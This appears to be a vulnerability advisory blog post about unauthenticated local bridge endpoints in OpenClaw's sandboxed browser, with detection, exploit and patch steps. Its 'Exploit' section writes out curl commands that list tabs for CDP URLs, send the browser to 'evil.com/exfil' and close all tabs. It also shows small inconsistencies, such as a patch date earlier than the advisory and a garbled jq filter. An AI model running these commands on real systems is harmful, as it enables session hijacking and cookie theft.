Listen to this Post
The vulnerability exists because when the sandboxed browser feature is enabled, openclaw starts a local HTTP bridge server bound to loopback (localhost) without enabling authentication. This server exposes sensitive browser control endpoints like /profiles, /tabs, and /agent/. Due to missing authentication wiring in the sandbox initialization path, any local process on the machine can send requests to these endpoints. A local attacker can enumerate open tabs to retrieve Chrome DevTools Protocol (CDP) WebSocket URLs, then use those to open, close, or navigate tabs. More critically, the attacker can execute arbitrary JavaScript in the context of open pages via CDP, allowing exfiltration of cookies, session data, and page contents from authenticated sessions. This exposure is limited to localhost (CVSS AV:L) but provides full compromise of any browser session running in the sandbox. The issue was introduced in the first npm release that shipped the sandbox browser bridge and affects all versions until the patch.
Platform: OpenClaw (npm)
Version: 2026.1.29-beta.1
Vulnerability: Missing Authentication
Severity: High
Date: 2026-02-18
Prediction: Patched 2026-02-14
What Undercode Say:
Analytics
Check installed OpenClaw version openclaw --version Check if sandbox browser bridge port is listening (default dynamic, find it) ss -tlnp | grep openclaw Test if bridge port requires authentication (should return 401 after patch) curl -v http://localhost:PORT/profiles Check config for sandbox browser setting grep -A 2 "sandbox.browser" ~/.openclaw/config.yaml Monitor logs for unauthenticated bridge access attempts tail -f ~/.openclaw/logs/sandbox-bridge.log | grep "WARN|unauthorized"
Exploit
Local attacker enumerates open tabs via unauthenticated bridge
curl -s http://localhost:PORT/tabs | jq '.[] | {id: .id, url: .url, cdpUrl: .cdpWebSocketUrl}'
Use extracted CDP URL to execute JavaScript in page context
WEBSOCKET_URL=$(curl -s http://localhost:PORT/tabs | jq -r '.[bash].cdpWebSocketUrl')
Connect to CDP and execute JavaScript to steal cookies
(Full CDP exploitation requires WebSocket client)
Navigate browser to attacker-controlled page
curl -X POST http://localhost:PORT/tabs/open -H "Content-Type: application/json" -d '{"url": "https://evil.com/exfil"}'
Close all tabs
curl -X DELETE http://localhost:PORT/tabs
Protection
Upgrade to patched version (recommended) npm install -g [email protected] Or disable sandboxed browser feature openclaw config set agents.defaults.sandbox.browser.enabled false After upgrade, verify auth is enforced (expect 401) curl -f http://localhost:PORT/profiles || echo "Auth enforced" Restart service systemctl --user restart openclaw-gateway Monitor for any existing compromise grep -r "CDP|sandbox-bridge" ~/.openclaw/logs/ | grep -B 5 -A 5 "$(date -d '7 days ago' +%Y-%m-%d)"
Impact
A local attacker with ability to execute arbitrary processes can fully compromise all browser sessions running in OpenClaw’s sandbox. This enables theft of cookies, session tokens, and page contents from authenticated web applications. The attacker can also manipulate browser behavior by opening malicious pages or closing legitimate ones. Since this runs on localhost, it bypasses network firewalls but any malicious process or compromised application on the same machine can exploit it. The vulnerability effectively nullifies the security isolation that the sandbox was designed to provide.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

